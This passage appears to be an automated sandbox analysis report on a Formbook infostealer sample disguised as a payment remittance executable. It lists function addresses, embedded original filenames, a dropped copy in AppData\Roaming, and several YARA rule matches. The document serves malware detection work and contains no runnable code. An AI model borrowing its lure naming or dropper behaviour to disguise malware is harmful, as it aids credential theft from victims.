            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE25180_2_06BE2518
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE3BD00_2_06BE3BD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE20F00_2_06BE20F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE49B80_2_06BE49B8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_06BE49A70_2_06BE49A7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040109D9_2_0040109D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004010A09_2_004010A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004012109_2_00401210
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040FBFC9_2_0040FBFC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040FC039_2_0040FC03
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0042D4E39_2_0042D4E3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00402D409_2_00402D40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0041650E9_2_0041650E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004165139_2_00416513
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040FE239_2_0040FE23
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040DEA39_2_0040DEA3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018541A29_2_018541A2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018601AA9_2_018601AA
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018581CC9_2_018581CC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017901009_2_01790100
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183A1189_2_0183A118
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018281589_2_01828158
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018320009_2_01832000
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018603E69_2_018603E6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AE3F09_2_017AE3F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185A3529_2_0185A352
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018202C09_2_018202C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018402749_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018605919_2_01860591
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A05359_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184E4F69_2_0184E4F6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018444209_2_01844420
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018524469_2_01852446
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A07709_2_017A0770
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C47509_2_017C4750
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179C7C09_2_0179C7C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BC6E09_2_017BC6E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B69629_2_017B6962
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0186A9A69_2_0186A9A6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A29A09_2_017A29A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A28409_2_017A2840
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AA8409_2_017AA840
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CE8F09_2_017CE8F0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017868B89_2_017868B8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01856BD79_2_01856BD7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185AB409_2_0185AB40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179EA809_2_0179EA80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AAD009_2_017AAD00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179ADE09_2_0179ADE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183CD1F9_2_0183CD1F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B8DBF9_2_017B8DBF
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840CB59_2_01840CB5
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0C009_2_017A0C00
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790CF29_2_01790CF2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181EFA09_2_0181EFA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C0F309_2_017C0F30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E2F289_2_017E2F28
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017ACFE09_2_017ACFE0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01792FC89_2_01792FC8
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01842F309_2_01842F30
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01814F409_2_01814F40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185CE939_2_0185CE93
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0E599_2_017A0E59
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185EEDB9_2_0185EEDB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185EE269_2_0185EE26
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B2E909_2_017B2E90
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178F1729_2_0178F172
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D516C9_2_017D516C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017AB1B09_2_017AB1B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0186B16B9_2_0186B16B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184F0CC9_2_0184F0CC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185F0E09_2_0185F0E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018570E99_2_018570E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A70C09_2_017A70C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178D34C9_2_0178D34C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185132D9_2_0185132D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E739A9_2_017E739A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018412ED9_2_018412ED
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BB2C09_2_017BB2C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A52A09_2_017A52A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183D5B09_2_0183D5B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018695C39_2_018695C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018575719_2_01857571
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017914609_2_01791460
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185F43F9_2_0185F43F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185F7B09_2_0185F7B0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018516CC9_2_018516CC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E56309_2_017E5630
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A99509_2_017A9950
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BB9509_2_017BB950
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018359109_2_01835910
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0180D8009_2_0180D800
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A38E09_2_017A38E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01815BF09_2_01815BF0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017DDBF99_2_017DDBF9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185FB769_2_0185FB76
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BFB809_2_017BFB80
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01841AA39_2_01841AA3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183DAAC9_2_0183DAAC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184DAC69_2_0184DAC6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01857A469_2_01857A46
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185FA499_2_0185FA49
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E5AA09_2_017E5AA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01813A6C9_2_01813A6C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A3D409_2_017A3D40
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BFDC09_2_017BFDC0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01851D5A9_2_01851D5A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01857D739_2_01857D73
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185FCF29_2_0185FCF2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01819C329_2_01819C32
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185FFB19_2_0185FFB1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185FF099_2_0185FF09
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01763FD59_2_01763FD5
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01763FD29_2_01763FD2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A1F929_2_017A1F92
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A9EB09_2_017A9EB0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0119D5BC10_2_0119D5BC
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E4A69810_2_06E4A698
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E444A810_2_06E444A8
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E4252810_2_06E42528
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E4251810_2_06E42518
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E43BD010_2_06E43BD0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E420F010_2_06E420F0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_06E449B810_2_06E449B8
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_072002D810_2_072002D8
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0720AA8010_2_0720AA80
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0720AA9010_2_0720AA90
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_08493C3010_2_08493C30
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0849DB4310_2_0849DB43
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0849666810_2_08496668
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A3010014_2_01A30100
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A8600014_2_01A86000
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AC02C014_2_01AC02C0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4053514_2_01A40535
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A3C7C014_2_01A3C7C0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4077014_2_01A40770
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A6475014_2_01A64750
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5C6E014_2_01A5C6E0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A429A014_2_01A429A0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5696214_2_01A56962
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A268B814_2_01A268B8
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7889014_2_01A78890
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A6E8F014_2_01A6E8F0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4A84014_2_01A4A840
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4284014_2_01A42840
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A3EA8014_2_01A3EA80
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A58DBF14_2_01A58DBF
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A3ADE014_2_01A3ADE0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A48DC014_2_01A48DC0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4AD0014_2_01A4AD00
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4ED7A14_2_01A4ED7A
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A30CF214_2_01A30CF2
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A40C0014_2_01A40C00
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01ABEFA014_2_01ABEFA0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A32FC814_2_01A32FC8
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A82F2814_2_01A82F28
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A60F3014_2_01A60F30
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AB4F4014_2_01AB4F40
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A52E9014_2_01A52E90
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A40E5914_2_01A40E59
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4B1B014_2_01A4B1B0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7516C14_2_01A7516C
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A2F17214_2_01A2F172
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A433F314_2_01A433F3
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A2D34C14_2_01A2D34C
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A452A014_2_01A452A0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5D2F014_2_01A5D2F0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5B2C014_2_01A5B2C0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4349714_2_01A43497
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A874E014_2_01A874E0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A3146014_2_01A31460
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4B73014_2_01A4B730
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4599014_2_01A45990
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A4995014_2_01A49950
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5B95014_2_01A5B950
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A438E014_2_01A438E0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AAD80014_2_01AAD800
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5FB8014_2_01A5FB80
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AB5BF014_2_01AB5BF0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7DBF914_2_01A7DBF9
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AB3A6C14_2_01AB3A6C
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A5FDC014_2_01A5FDC0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A43D4014_2_01A43D40
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A59C2014_2_01A59C20
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01AB9C3214_2_01AB9C32
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A41F9214_2_01A41F92
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A49EB014_2_01A49EB0
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: String function: 01A87E54 appears 97 times
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: String function: 01AAEA12 appears 36 times
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: String function: 017E7E54 appears 111 times
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: String function: 017D5130 appears 58 times
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: String function: 0180EA12 appears 86 times
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: String function: 0178B970 appears 280 times
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: String function: 0181F290 appears 105 times
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2082504139.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2084812908.0000000003A6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2081039234.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2092249353.0000000006B40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2093278786.0000000006F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000000.00000002.2091903672.0000000006AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.000000000188D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWINVER.EXEj% vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeBinary or memory string: OriginalFilenameqUJT.exeB vs 4TH HIRE SOA REMITTANCE_USD280,000.exe
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2334768976.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2332025821.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
